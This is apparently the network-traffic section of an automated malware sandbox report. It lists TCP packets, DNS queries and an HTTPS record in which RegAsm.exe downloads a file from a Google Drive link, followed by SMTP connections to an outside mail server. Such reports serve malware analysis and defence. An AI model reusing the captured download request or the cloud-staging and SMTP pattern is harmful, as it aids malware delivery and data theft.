                                                          Oct 6, 2021 18:03:54.631732941 CEST44349789142.250.185.65192.168.11.20
                                                          Oct 6, 2021 18:03:54.631747961 CEST44349789142.250.185.65192.168.11.20
                                                          Oct 6, 2021 18:03:54.631876945 CEST49789443192.168.11.20142.250.185.65
                                                          Oct 6, 2021 18:03:54.631901979 CEST44349789142.250.185.65192.168.11.20
                                                          Oct 6, 2021 18:03:54.632096052 CEST49789443192.168.11.20142.250.185.65
                                                          Oct 6, 2021 18:03:54.632143021 CEST44349789142.250.185.65192.168.11.20
                                                          Oct 6, 2021 18:03:54.632333994 CEST49789443192.168.11.20142.250.185.65
                                                          Oct 6, 2021 18:03:54.632555008 CEST44349789142.250.185.65192.168.11.20
                                                          Oct 6, 2021 18:03:54.632708073 CEST49789443192.168.11.20142.250.185.65
                                                          Oct 6, 2021 18:03:54.632738113 CEST44349789142.250.185.65192.168.11.20
                                                          Oct 6, 2021 18:03:54.632838964 CEST44349789142.250.185.65192.168.11.20
                                                          Oct 6, 2021 18:03:54.632885933 CEST49789443192.168.11.20142.250.185.65
                                                          Oct 6, 2021 18:03:54.632913113 CEST44349789142.250.185.65192.168.11.20
                                                          Oct 6, 2021 18:03:54.632983923 CEST49789443192.168.11.20142.250.185.65
                                                          Oct 6, 2021 18:03:54.633064032 CEST49789443192.168.11.20142.250.185.65
                                                          Oct 6, 2021 18:03:54.633235931 CEST44349789142.250.185.65192.168.11.20
                                                          Oct 6, 2021 18:03:54.633379936 CEST49789443192.168.11.20142.250.185.65
                                                          Oct 6, 2021 18:03:54.633399963 CEST44349789142.250.185.65192.168.11.20
                                                          Oct 6, 2021 18:03:54.633415937 CEST44349789142.250.185.65192.168.11.20
                                                          Oct 6, 2021 18:03:54.633553028 CEST49789443192.168.11.20142.250.185.65
                                                          Oct 6, 2021 18:03:54.633574009 CEST49789443192.168.11.20142.250.185.65
                                                          Oct 6, 2021 18:03:54.633589029 CEST44349789142.250.185.65192.168.11.20
                                                          Oct 6, 2021 18:03:54.633729935 CEST49789443192.168.11.20142.250.185.65
                                                          Oct 6, 2021 18:03:54.634094954 CEST44349789142.250.185.65192.168.11.20
                                                          Oct 6, 2021 18:03:54.634232044 CEST44349789142.250.185.65192.168.11.20
                                                          Oct 6, 2021 18:03:54.634255886 CEST49789443192.168.11.20142.250.185.65
                                                          Oct 6, 2021 18:03:54.634278059 CEST44349789142.250.185.65192.168.11.20
                                                          Oct 6, 2021 18:03:54.634378910 CEST49789443192.168.11.20142.250.185.65
                                                          Oct 6, 2021 18:03:54.634403944 CEST44349789142.250.185.65192.168.11.20
                                                          Oct 6, 2021 18:03:54.634571075 CEST49789443192.168.11.20142.250.185.65
                                                          Oct 6, 2021 18:03:54.634602070 CEST44349789142.250.185.65192.168.11.20
                                                          Oct 6, 2021 18:03:54.634803057 CEST49789443192.168.11.20142.250.185.65
                                                          Oct 6, 2021 18:03:54.634907007 CEST44349789142.250.185.65192.168.11.20
                                                          Oct 6, 2021 18:03:54.635056019 CEST44349789142.250.185.65192.168.11.20
                                                          Oct 6, 2021 18:03:54.635118008 CEST49789443192.168.11.20142.250.185.65
                                                          Oct 6, 2021 18:03:54.635142088 CEST44349789142.250.185.65192.168.11.20
                                                          Oct 6, 2021 18:03:54.635202885 CEST49789443192.168.11.20142.250.185.65
                                                          Oct 6, 2021 18:03:54.635287046 CEST49789443192.168.11.20142.250.185.65
                                                          Oct 6, 2021 18:03:54.635303020 CEST44349789142.250.185.65192.168.11.20
                                                          Oct 6, 2021 18:03:54.635457993 CEST49789443192.168.11.20142.250.185.65
                                                          Oct 6, 2021 18:03:54.635659933 CEST44349789142.250.185.65192.168.11.20
                                                          Oct 6, 2021 18:03:54.635802031 CEST49789443192.168.11.20142.250.185.65
                                                          Oct 6, 2021 18:03:54.635828018 CEST44349789142.250.185.65192.168.11.20
                                                          Oct 6, 2021 18:03:54.635936022 CEST44349789142.250.185.65192.168.11.20
                                                          Oct 6, 2021 18:03:54.635974884 CEST49789443192.168.11.20142.250.185.65
                                                          Oct 6, 2021 18:03:54.635998964 CEST44349789142.250.185.65192.168.11.20
                                                          Oct 6, 2021 18:03:54.636106968 CEST49789443192.168.11.20142.250.185.65
                                                          Oct 6, 2021 18:03:54.636116982 CEST49789443192.168.11.20142.250.185.65
                                                          Oct 6, 2021 18:03:54.636487961 CEST44349789142.250.185.65192.168.11.20
                                                          Oct 6, 2021 18:03:54.636639118 CEST49789443192.168.11.20142.250.185.65
                                                          Oct 6, 2021 18:03:54.636666059 CEST44349789142.250.185.65192.168.11.20
                                                          Oct 6, 2021 18:03:54.636780024 CEST44349789142.250.185.65192.168.11.20
                                                          Oct 6, 2021 18:03:54.636811972 CEST49789443192.168.11.20142.250.185.65
                                                          Oct 6, 2021 18:03:54.636833906 CEST44349789142.250.185.65192.168.11.20
                                                          Oct 6, 2021 18:03:54.636925936 CEST49789443192.168.11.20142.250.185.65
                                                          Oct 6, 2021 18:03:54.637315989 CEST44349789142.250.185.65192.168.11.20
                                                          Oct 6, 2021 18:03:54.637466908 CEST49789443192.168.11.20142.250.185.65
                                                          Oct 6, 2021 18:03:54.637491941 CEST44349789142.250.185.65192.168.11.20
                                                          Oct 6, 2021 18:03:54.637594938 CEST44349789142.250.185.65192.168.11.20
                                                          Oct 6, 2021 18:03:54.637639999 CEST49789443192.168.11.20142.250.185.65
                                                          Oct 6, 2021 18:03:54.637662888 CEST44349789142.250.185.65192.168.11.20
                                                          Oct 6, 2021 18:03:54.637753963 CEST49789443192.168.11.20142.250.185.65
                                                          Oct 6, 2021 18:03:54.637825012 CEST49789443192.168.11.20142.250.185.65
                                                          Oct 6, 2021 18:03:54.638140917 CEST44349789142.250.185.65192.168.11.20
                                                          Oct 6, 2021 18:03:54.638284922 CEST44349789142.250.185.65192.168.11.20
                                                          Oct 6, 2021 18:03:54.638295889 CEST49789443192.168.11.20142.250.185.65
                                                          Oct 6, 2021 18:03:54.638319969 CEST44349789142.250.185.65192.168.11.20
                                                          Oct 6, 2021 18:03:54.638441086 CEST49789443192.168.11.20142.250.185.65
                                                          Oct 6, 2021 18:03:54.638461113 CEST49789443192.168.11.20142.250.185.65
                                                          Oct 6, 2021 18:03:54.638477087 CEST44349789142.250.185.65192.168.11.20
                                                          Oct 6, 2021 18:03:54.638617039 CEST49789443192.168.11.20142.250.185.65
                                                          Oct 6, 2021 18:03:54.639301062 CEST44349789142.250.185.65192.168.11.20
                                                          Oct 6, 2021 18:03:54.639446974 CEST49789443192.168.11.20142.250.185.65
                                                          Oct 6, 2021 18:03:54.639463902 CEST44349789142.250.185.65192.168.11.20
                                                          Oct 6, 2021 18:03:54.639478922 CEST44349789142.250.185.65192.168.11.20
                                                          Oct 6, 2021 18:03:54.639616966 CEST49789443192.168.11.20142.250.185.65
                                                          Oct 6, 2021 18:03:54.639631033 CEST49789443192.168.11.20142.250.185.65
                                                          Oct 6, 2021 18:03:54.639643908 CEST44349789142.250.185.65192.168.11.20
                                                          Oct 6, 2021 18:03:54.639672995 CEST44349789142.250.185.65192.168.11.20
                                                          Oct 6, 2021 18:03:54.639789104 CEST49789443192.168.11.20142.250.185.65
                                                          Oct 6, 2021 18:03:54.639813900 CEST44349789142.250.185.65192.168.11.20
                                                          Oct 6, 2021 18:03:54.639934063 CEST44349789142.250.185.65192.168.11.20
                                                          Oct 6, 2021 18:03:54.639959097 CEST49789443192.168.11.20142.250.185.65
                                                          Oct 6, 2021 18:03:54.639977932 CEST44349789142.250.185.65192.168.11.20
                                                          Oct 6, 2021 18:03:54.640086889 CEST49789443192.168.11.20142.250.185.65
                                                          Oct 6, 2021 18:03:54.640104055 CEST49789443192.168.11.20142.250.185.65
                                                          Oct 6, 2021 18:03:54.640119076 CEST44349789142.250.185.65192.168.11.20
                                                          Oct 6, 2021 18:03:54.640225887 CEST44349789142.250.185.65192.168.11.20
                                                          Oct 6, 2021 18:03:54.640278101 CEST49789443192.168.11.20142.250.185.65
                                                          Oct 6, 2021 18:03:54.640305996 CEST44349789142.250.185.65192.168.11.20
                                                          Oct 6, 2021 18:03:54.640449047 CEST49789443192.168.11.20142.250.185.65
                                                          Oct 6, 2021 18:03:54.640484095 CEST49789443192.168.11.20142.250.185.65
                                                          Oct 6, 2021 18:03:54.641283035 CEST44349789142.250.185.65192.168.11.20
                                                          Oct 6, 2021 18:03:54.641439915 CEST49789443192.168.11.20142.250.185.65
                                                          Oct 6, 2021 18:03:54.641474962 CEST44349789142.250.185.65192.168.11.20
                                                          Oct 6, 2021 18:03:54.641628027 CEST44349789142.250.185.65192.168.11.20
                                                          Oct 6, 2021 18:03:54.641652107 CEST49789443192.168.11.20142.250.185.65
                                                          Oct 6, 2021 18:03:54.641674042 CEST44349789142.250.185.65192.168.11.20
                                                          Oct 6, 2021 18:03:54.641786098 CEST49789443192.168.11.20142.250.185.65
                                                          Oct 6, 2021 18:03:54.641804934 CEST49789443192.168.11.20142.250.185.65
                                                          Oct 6, 2021 18:03:54.641819954 CEST44349789142.250.185.65192.168.11.20
                                                          Oct 6, 2021 18:03:54.642003059 CEST49789443192.168.11.20142.250.185.65
                                                          Oct 6, 2021 18:03:54.642029047 CEST44349789142.250.185.65192.168.11.20
                                                          Oct 6, 2021 18:03:54.642045975 CEST44349789142.250.185.65192.168.11.20
                                                          Oct 6, 2021 18:03:54.642173052 CEST49789443192.168.11.20142.250.185.65
                                                          Oct 6, 2021 18:03:54.642195940 CEST44349789142.250.185.65192.168.11.20
                                                          Oct 6, 2021 18:03:54.642317057 CEST44349789142.250.185.65192.168.11.20
                                                          Oct 6, 2021 18:03:54.642354012 CEST49789443192.168.11.20142.250.185.65
                                                          Oct 6, 2021 18:03:54.642374039 CEST44349789142.250.185.65192.168.11.20
                                                          Oct 6, 2021 18:03:54.642461061 CEST49789443192.168.11.20142.250.185.65
                                                          Oct 6, 2021 18:03:54.642508030 CEST49789443192.168.11.20142.250.185.65
                                                          Oct 6, 2021 18:03:54.642525911 CEST44349789142.250.185.65192.168.11.20
                                                          Oct 6, 2021 18:03:54.642680883 CEST44349789142.250.185.65192.168.11.20
                                                          Oct 6, 2021 18:03:54.642699957 CEST49789443192.168.11.20142.250.185.65
                                                          Oct 6, 2021 18:03:54.642726898 CEST44349789142.250.185.65192.168.11.20
                                                          Oct 6, 2021 18:03:54.642743111 CEST44349789142.250.185.65192.168.11.20
                                                          Oct 6, 2021 18:03:54.642821074 CEST49789443192.168.11.20142.250.185.65
                                                          Oct 6, 2021 18:03:54.642834902 CEST49789443192.168.11.20142.250.185.65
                                                          Oct 6, 2021 18:03:54.642867088 CEST49789443192.168.11.20142.250.185.65
                                                          Oct 6, 2021 18:03:54.642890930 CEST44349789142.250.185.65192.168.11.20
                                                          Oct 6, 2021 18:03:54.643038034 CEST49789443192.168.11.20142.250.185.65
                                                          Oct 6, 2021 18:03:54.643063068 CEST44349789142.250.185.65192.168.11.20
                                                          Oct 6, 2021 18:03:54.643171072 CEST44349789142.250.185.65192.168.11.20
                                                          Oct 6, 2021 18:03:54.643208027 CEST49789443192.168.11.20142.250.185.65
                                                          Oct 6, 2021 18:03:54.643228054 CEST44349789142.250.185.65192.168.11.20
                                                          Oct 6, 2021 18:03:54.643361092 CEST49789443192.168.11.20142.250.185.65
                                                          Oct 6, 2021 18:03:54.643388987 CEST44349789142.250.185.65192.168.11.20
                                                          Oct 6, 2021 18:03:54.643516064 CEST44349789142.250.185.65192.168.11.20
                                                          Oct 6, 2021 18:03:54.643532038 CEST49789443192.168.11.20142.250.185.65
                                                          Oct 6, 2021 18:03:54.643549919 CEST44349789142.250.185.65192.168.11.20
                                                          Oct 6, 2021 18:03:54.643712044 CEST49789443192.168.11.20142.250.185.65
                                                          Oct 6, 2021 18:03:54.643713951 CEST44349789142.250.185.65192.168.11.20
                                                          Oct 6, 2021 18:03:54.643738985 CEST44349789142.250.185.65192.168.11.20
                                                          Oct 6, 2021 18:03:54.643846989 CEST49789443192.168.11.20142.250.185.65
                                                          Oct 6, 2021 18:03:54.643865108 CEST49789443192.168.11.20142.250.185.65
                                                          Oct 6, 2021 18:03:54.643881083 CEST44349789142.250.185.65192.168.11.20
                                                          Oct 6, 2021 18:03:54.644022942 CEST44349789142.250.185.65192.168.11.20
                                                          Oct 6, 2021 18:03:54.644046068 CEST49789443192.168.11.20142.250.185.65
                                                          Oct 6, 2021 18:03:54.644064903 CEST44349789142.250.185.65192.168.11.20
                                                          Oct 6, 2021 18:03:54.644153118 CEST49789443192.168.11.20142.250.185.65
                                                          Oct 6, 2021 18:03:54.644171000 CEST49789443192.168.11.20142.250.185.65
                                                          Oct 6, 2021 18:03:54.644186974 CEST44349789142.250.185.65192.168.11.20
                                                          Oct 6, 2021 18:03:54.644335985 CEST44349789142.250.185.65192.168.11.20
                                                          Oct 6, 2021 18:03:54.644377947 CEST49789443192.168.11.20142.250.185.65
                                                          Oct 6, 2021 18:03:54.644402027 CEST44349789142.250.185.65192.168.11.20
                                                          Oct 6, 2021 18:03:54.644485950 CEST49789443192.168.11.20142.250.185.65
                                                          Oct 6, 2021 18:03:54.644540071 CEST49789443192.168.11.20142.250.185.65
                                                          Oct 6, 2021 18:03:54.644563913 CEST44349789142.250.185.65192.168.11.20
                                                          Oct 6, 2021 18:03:54.644711018 CEST49789443192.168.11.20142.250.185.65
                                                          Oct 6, 2021 18:03:54.644733906 CEST44349789142.250.185.65192.168.11.20
                                                          Oct 6, 2021 18:03:54.644871950 CEST44349789142.250.185.65192.168.11.20
                                                          Oct 6, 2021 18:03:54.644879103 CEST49789443192.168.11.20142.250.185.65
                                                          Oct 6, 2021 18:03:54.644901037 CEST44349789142.250.185.65192.168.11.20
                                                          Oct 6, 2021 18:03:54.645044088 CEST49789443192.168.11.20142.250.185.65
                                                          Oct 6, 2021 18:03:54.645056963 CEST44349789142.250.185.65192.168.11.20
                                                          Oct 6, 2021 18:03:54.645080090 CEST44349789142.250.185.65192.168.11.20
                                                          Oct 6, 2021 18:03:54.645188093 CEST49789443192.168.11.20142.250.185.65
                                                          Oct 6, 2021 18:03:54.645205021 CEST49789443192.168.11.20142.250.185.65
                                                          Oct 6, 2021 18:03:54.645221949 CEST44349789142.250.185.65192.168.11.20
                                                          Oct 6, 2021 18:03:54.645340919 CEST44349789142.250.185.65192.168.11.20
                                                          Oct 6, 2021 18:03:54.645385981 CEST49789443192.168.11.20142.250.185.65
                                                          Oct 6, 2021 18:03:54.645406961 CEST44349789142.250.185.65192.168.11.20
                                                          Oct 6, 2021 18:03:54.645498037 CEST49789443192.168.11.20142.250.185.65
                                                          Oct 6, 2021 18:03:54.645539999 CEST49789443192.168.11.20142.250.185.65
                                                          Oct 6, 2021 18:03:54.645559072 CEST44349789142.250.185.65192.168.11.20
                                                          Oct 6, 2021 18:03:54.645703077 CEST44349789142.250.185.65192.168.11.20
                                                          Oct 6, 2021 18:03:54.645729065 CEST49789443192.168.11.20142.250.185.65
                                                          Oct 6, 2021 18:03:54.645747900 CEST44349789142.250.185.65192.168.11.20
                                                          Oct 6, 2021 18:03:54.645863056 CEST49789443192.168.11.20142.250.185.65
                                                          Oct 6, 2021 18:03:54.645886898 CEST49789443192.168.11.20142.250.185.65
                                                          Oct 6, 2021 18:03:54.645906925 CEST44349789142.250.185.65192.168.11.20
                                                          Oct 6, 2021 18:03:54.646070004 CEST49789443192.168.11.20142.250.185.65
                                                          Oct 6, 2021 18:03:54.646097898 CEST44349789142.250.185.65192.168.11.20
                                                          Oct 6, 2021 18:03:54.646112919 CEST44349789142.250.185.65192.168.11.20
                                                          Oct 6, 2021 18:03:54.646224022 CEST49789443192.168.11.20142.250.185.65
                                                          Oct 6, 2021 18:03:54.646241903 CEST49789443192.168.11.20142.250.185.65
                                                          Oct 6, 2021 18:03:54.646256924 CEST44349789142.250.185.65192.168.11.20
                                                          Oct 6, 2021 18:03:54.646403074 CEST49789443192.168.11.20142.250.185.65
                                                          Oct 6, 2021 18:03:54.646425009 CEST44349789142.250.185.65192.168.11.20
                                                          Oct 6, 2021 18:03:54.646439075 CEST44349789142.250.185.65192.168.11.20
                                                          Oct 6, 2021 18:03:54.646574974 CEST49789443192.168.11.20142.250.185.65
                                                          Oct 6, 2021 18:03:54.646593094 CEST49789443192.168.11.20142.250.185.65
                                                          Oct 6, 2021 18:03:54.646609068 CEST44349789142.250.185.65192.168.11.20
                                                          Oct 6, 2021 18:03:54.646733999 CEST44349789142.250.185.65192.168.11.20
                                                          Oct 6, 2021 18:03:54.646764040 CEST49789443192.168.11.20142.250.185.65
                                                          Oct 6, 2021 18:03:54.646783113 CEST44349789142.250.185.65192.168.11.20
                                                          Oct 6, 2021 18:03:54.646881104 CEST49789443192.168.11.20142.250.185.65
                                                          Oct 6, 2021 18:03:54.646927118 CEST49789443192.168.11.20142.250.185.65
                                                          Oct 6, 2021 18:03:54.646945953 CEST44349789142.250.185.65192.168.11.20
                                                          Oct 6, 2021 18:03:54.647087097 CEST49789443192.168.11.20142.250.185.65
                                                          Oct 6, 2021 18:03:54.647109985 CEST44349789142.250.185.65192.168.11.20
                                                          Oct 6, 2021 18:03:54.647125006 CEST44349789142.250.185.65192.168.11.20
                                                          Oct 6, 2021 18:03:54.647267103 CEST49789443192.168.11.20142.250.185.65
                                                          Oct 6, 2021 18:03:54.647279978 CEST49789443192.168.11.20142.250.185.65
                                                          Oct 6, 2021 18:03:54.647291899 CEST44349789142.250.185.65192.168.11.20
                                                          Oct 6, 2021 18:03:54.647313118 CEST44349789142.250.185.65192.168.11.20
                                                          Oct 6, 2021 18:03:54.647419930 CEST49789443192.168.11.20142.250.185.65
                                                          Oct 6, 2021 18:03:54.647439003 CEST49789443192.168.11.20142.250.185.65
                                                          Oct 6, 2021 18:03:54.647454023 CEST44349789142.250.185.65192.168.11.20
                                                          Oct 6, 2021 18:03:54.647599936 CEST49789443192.168.11.20142.250.185.65
                                                          Oct 6, 2021 18:03:54.647612095 CEST44349789142.250.185.65192.168.11.20
                                                          Oct 6, 2021 18:03:54.647634983 CEST44349789142.250.185.65192.168.11.20
                                                          Oct 6, 2021 18:03:54.647763968 CEST49789443192.168.11.20142.250.185.65
                                                          Oct 6, 2021 18:03:54.647783041 CEST44349789142.250.185.65192.168.11.20
                                                          Oct 6, 2021 18:03:54.647924900 CEST49789443192.168.11.20142.250.185.65
                                                          Oct 6, 2021 18:03:54.647948027 CEST44349789142.250.185.65192.168.11.20
                                                          Oct 6, 2021 18:03:54.648103952 CEST49789443192.168.11.20142.250.185.65
                                                          Oct 6, 2021 18:03:54.648133039 CEST44349789142.250.185.65192.168.11.20
                                                          Oct 6, 2021 18:03:54.648139000 CEST49789443192.168.11.20142.250.185.65
                                                          Oct 6, 2021 18:03:54.648152113 CEST44349789142.250.185.65192.168.11.20
                                                          Oct 6, 2021 18:03:54.648293018 CEST49789443192.168.11.20142.250.185.65
                                                          Oct 6, 2021 18:03:54.648319960 CEST44349789142.250.185.65192.168.11.20
                                                          Oct 6, 2021 18:03:54.648325920 CEST49789443192.168.11.20142.250.185.65
                                                          Oct 6, 2021 18:03:54.648338079 CEST44349789142.250.185.65192.168.11.20
                                                          Oct 6, 2021 18:03:54.648473978 CEST49789443192.168.11.20142.250.185.65
                                                          Oct 6, 2021 18:03:54.648499966 CEST44349789142.250.185.65192.168.11.20
                                                          Oct 6, 2021 18:03:54.648698092 CEST49789443192.168.11.20142.250.185.65
                                                          Oct 6, 2021 18:03:54.648713112 CEST44349789142.250.185.65192.168.11.20
                                                          Oct 6, 2021 18:03:54.648736954 CEST44349789142.250.185.65192.168.11.20
                                                          Oct 6, 2021 18:03:54.648852110 CEST49789443192.168.11.20142.250.185.65
                                                          Oct 6, 2021 18:03:54.648899078 CEST49789443192.168.11.20142.250.185.65
                                                          Oct 6, 2021 18:03:54.648919106 CEST44349789142.250.185.65192.168.11.20
                                                          Oct 6, 2021 18:03:54.649068117 CEST49789443192.168.11.20142.250.185.65
                                                          Oct 6, 2021 18:03:54.649085999 CEST44349789142.250.185.65192.168.11.20
                                                          Oct 6, 2021 18:03:54.649101019 CEST44349789142.250.185.65192.168.11.20
                                                          Oct 6, 2021 18:03:54.649220943 CEST49789443192.168.11.20142.250.185.65
                                                          Oct 6, 2021 18:03:54.649239063 CEST49789443192.168.11.20142.250.185.65
                                                          Oct 6, 2021 18:03:54.649266958 CEST49789443192.168.11.20142.250.185.65
                                                          Oct 6, 2021 18:03:54.649287939 CEST44349789142.250.185.65192.168.11.20
                                                          Oct 6, 2021 18:03:54.649301052 CEST44349789142.250.185.65192.168.11.20
                                                          Oct 6, 2021 18:03:54.649418116 CEST49789443192.168.11.20142.250.185.65
                                                          Oct 6, 2021 18:03:54.649435043 CEST49789443192.168.11.20142.250.185.65
                                                          Oct 6, 2021 18:03:54.649451971 CEST44349789142.250.185.65192.168.11.20
                                                          Oct 6, 2021 18:03:54.649583101 CEST44349789142.250.185.65192.168.11.20
                                                          Oct 6, 2021 18:03:54.649597883 CEST49789443192.168.11.20142.250.185.65
                                                          Oct 6, 2021 18:03:54.649619102 CEST44349789142.250.185.65192.168.11.20
                                                          Oct 6, 2021 18:03:54.649714947 CEST49789443192.168.11.20142.250.185.65
                                                          Oct 6, 2021 18:03:54.649733067 CEST49789443192.168.11.20142.250.185.65
                                                          Oct 6, 2021 18:03:54.649748087 CEST44349789142.250.185.65192.168.11.20
                                                          Oct 6, 2021 18:03:54.649889946 CEST44349789142.250.185.65192.168.11.20
                                                          Oct 6, 2021 18:03:54.649940968 CEST49789443192.168.11.20142.250.185.65
                                                          Oct 6, 2021 18:03:54.649986982 CEST49789443192.168.11.20142.250.185.65
                                                          Oct 6, 2021 18:03:54.650006056 CEST44349789142.250.185.65192.168.11.20
                                                          Oct 6, 2021 18:03:54.650039911 CEST49789443192.168.11.20142.250.185.65
                                                          Oct 6, 2021 18:05:29.483418941 CEST49822587192.168.11.20109.169.39.245
                                                          Oct 6, 2021 18:05:29.502198935 CEST58749822109.169.39.245192.168.11.20
                                                          Oct 6, 2021 18:05:29.502393007 CEST49822587192.168.11.20109.169.39.245
                                                          Oct 6, 2021 18:05:29.522721052 CEST58749822109.169.39.245192.168.11.20
                                                          Oct 6, 2021 18:05:29.523228884 CEST49822587192.168.11.20109.169.39.245
                                                          Oct 6, 2021 18:05:29.542480946 CEST58749822109.169.39.245192.168.11.20
                                                          Oct 6, 2021 18:05:29.542747021 CEST49822587192.168.11.20109.169.39.245
                                                          Oct 6, 2021 18:05:29.569701910 CEST58749822109.169.39.245192.168.11.20
                                                          Oct 6, 2021 18:05:29.573345900 CEST49822587192.168.11.20109.169.39.245
                                                          Oct 6, 2021 18:05:29.607784986 CEST58749822109.169.39.245192.168.11.20
                                                          Oct 6, 2021 18:05:29.607862949 CEST58749822109.169.39.245192.168.11.20
                                                          Oct 6, 2021 18:05:29.607918024 CEST58749822109.169.39.245192.168.11.20
                                                          Oct 6, 2021 18:05:29.607955933 CEST58749822109.169.39.245192.168.11.20
                                                          Oct 6, 2021 18:05:29.608081102 CEST49822587192.168.11.20109.169.39.245
                                                          Oct 6, 2021 18:05:29.608141899 CEST49822587192.168.11.20109.169.39.245
                                                          Oct 6, 2021 18:05:29.609555006 CEST58749822109.169.39.245192.168.11.20
                                                          Oct 6, 2021 18:05:29.612663984 CEST49822587192.168.11.20109.169.39.245
                                                          Oct 6, 2021 18:05:29.632515907 CEST58749822109.169.39.245192.168.11.20
                                                          Oct 6, 2021 18:05:29.679368019 CEST49822587192.168.11.20109.169.39.245
                                                          Oct 6, 2021 18:05:29.771240950 CEST49822587192.168.11.20109.169.39.245
                                                          Oct 6, 2021 18:05:29.790175915 CEST58749822109.169.39.245192.168.11.20
                                                          Oct 6, 2021 18:05:29.791455030 CEST49822587192.168.11.20109.169.39.245
                                                          Oct 6, 2021 18:05:29.811117887 CEST58749822109.169.39.245192.168.11.20
                                                          Oct 6, 2021 18:05:29.811646938 CEST49822587192.168.11.20109.169.39.245
                                                          Oct 6, 2021 18:05:29.835150003 CEST58749822109.169.39.245192.168.11.20
                                                          Oct 6, 2021 18:05:29.835796118 CEST49822587192.168.11.20109.169.39.245
                                                          Oct 6, 2021 18:05:29.854991913 CEST58749822109.169.39.245192.168.11.20
                                                          Oct 6, 2021 18:05:29.855320930 CEST49822587192.168.11.20109.169.39.245
                                                          Oct 6, 2021 18:05:29.876231909 CEST58749822109.169.39.245192.168.11.20
                                                          Oct 6, 2021 18:05:29.876619101 CEST49822587192.168.11.20109.169.39.245
                                                          Oct 6, 2021 18:05:29.895598888 CEST58749822109.169.39.245192.168.11.20
                                                          Oct 6, 2021 18:05:29.923337936 CEST49822587192.168.11.20109.169.39.245
                                                          Oct 6, 2021 18:05:29.923355103 CEST49822587192.168.11.20109.169.39.245
                                                          Oct 6, 2021 18:05:29.923464060 CEST49822587192.168.11.20109.169.39.245
                                                          Oct 6, 2021 18:05:29.923472881 CEST49822587192.168.11.20109.169.39.245
                                                          Oct 6, 2021 18:05:29.942456961 CEST58749822109.169.39.245192.168.11.20
                                                          Oct 6, 2021 18:05:29.942565918 CEST58749822109.169.39.245192.168.11.20
                                                          Oct 6, 2021 18:05:29.942888975 CEST58749822109.169.39.245192.168.11.20
                                                          Oct 6, 2021 18:05:29.955451965 CEST58749822109.169.39.245192.168.11.20
                                                          Oct 6, 2021 18:05:30.007405043 CEST49822587192.168.11.20109.169.39.245
                                                          Oct 6, 2021 18:07:09.407622099 CEST49822587192.168.11.20109.169.39.245
                                                          Oct 6, 2021 18:07:09.428164005 CEST58749822109.169.39.245192.168.11.20
                                                          Oct 6, 2021 18:07:09.428224087 CEST58749822109.169.39.245192.168.11.20
                                                          Oct 6, 2021 18:07:09.428369045 CEST49822587192.168.11.20109.169.39.245
                                                          Oct 6, 2021 18:07:09.428740978 CEST49822587192.168.11.20109.169.39.245
                                                          Oct 6, 2021 18:07:09.429181099 CEST58749822109.169.39.245192.168.11.20
                                                          Oct 6, 2021 18:07:09.429359913 CEST49822587192.168.11.20109.169.39.245

                                                          UDP Packets

                                                          TimestampSource PortDest PortSource IPDest IP
                                                          Oct 6, 2021 18:03:53.640908003 CEST5373453192.168.11.201.1.1.1
                                                          Oct 6, 2021 18:03:53.649512053 CEST53537341.1.1.1192.168.11.20
                                                          Oct 6, 2021 18:03:54.320511103 CEST5180753192.168.11.201.1.1.1
                                                          Oct 6, 2021 18:03:54.351597071 CEST53518071.1.1.1192.168.11.20
                                                          Oct 6, 2021 18:05:29.380184889 CEST5424953192.168.11.201.1.1.1
                                                          Oct 6, 2021 18:05:29.427248001 CEST53542491.1.1.1192.168.11.20
                                                          Oct 6, 2021 18:05:55.273214102 CEST5899953192.168.11.201.1.1.1
                                                          Oct 6, 2021 18:05:55.281928062 CEST53589991.1.1.1192.168.11.20

                                                          DNS Queries

                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                          Oct 6, 2021 18:03:53.640908003 CEST192.168.11.201.1.1.10xb933Standard query (0)drive.google.comA (IP address)IN (0x0001)
                                                          Oct 6, 2021 18:03:54.320511103 CEST192.168.11.201.1.1.10xb289Standard query (0)doc-0o-88-docs.googleusercontent.comA (IP address)IN (0x0001)
                                                          Oct 6, 2021 18:05:29.380184889 CEST192.168.11.201.1.1.10x15b1Standard query (0)mail.reyesyasociados.comA (IP address)IN (0x0001)
                                                          Oct 6, 2021 18:05:55.273214102 CEST192.168.11.201.1.1.10xa2f2Standard query (0)spclient.wg.spotify.comA (IP address)IN (0x0001)

                                                          DNS Answers

                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                          Oct 6, 2021 18:03:53.649512053 CEST1.1.1.1192.168.11.200xb933No error (0)drive.google.com172.217.18.110A (IP address)IN (0x0001)
                                                          Oct 6, 2021 18:03:54.351597071 CEST1.1.1.1192.168.11.200xb289No error (0)doc-0o-88-docs.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)
                                                          Oct 6, 2021 18:03:54.351597071 CEST1.1.1.1192.168.11.200xb289No error (0)googlehosted.l.googleusercontent.com142.250.185.65A (IP address)IN (0x0001)
                                                          Oct 6, 2021 18:05:29.427248001 CEST1.1.1.1192.168.11.200x15b1No error (0)mail.reyesyasociados.com109.169.39.245A (IP address)IN (0x0001)
                                                          Oct 6, 2021 18:05:55.281928062 CEST1.1.1.1192.168.11.200xa2f2No error (0)spclient.wg.spotify.comedge-web.dual-gslb.spotify.comCNAME (Canonical name)IN (0x0001)
                                                          Oct 6, 2021 18:05:55.281928062 CEST1.1.1.1192.168.11.200xa2f2No error (0)edge-web.dual-gslb.spotify.com35.186.224.25A (IP address)IN (0x0001)

                                                          HTTP Request Dependency Graph

                                                          • drive.google.com
                                                          • doc-0o-88-docs.googleusercontent.com

                                                          HTTPS Proxied Packets

                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                          0192.168.11.2049787172.217.18.110443C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                          TimestampkBytes transferredDirectionData
                                                          2021-10-06 16:03:53 UTC0OUTGET /uc?export=download&id=1Z97ZrughfIgx00iX8hM7vfhUS8AYDEWo HTTP/1.1
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                          Host: drive.google.com
                                                          Cache-Control: no-cache
                                                          2021-10-06 16:03:54 UTC0INHTTP/1.1 302 Moved Temporarily
                                                          Content-Type: text/html; charset=UTF-8
                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                          Pragma: no-cache
                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                          Date: Wed, 06 Oct 2021 16:03:54 GMT
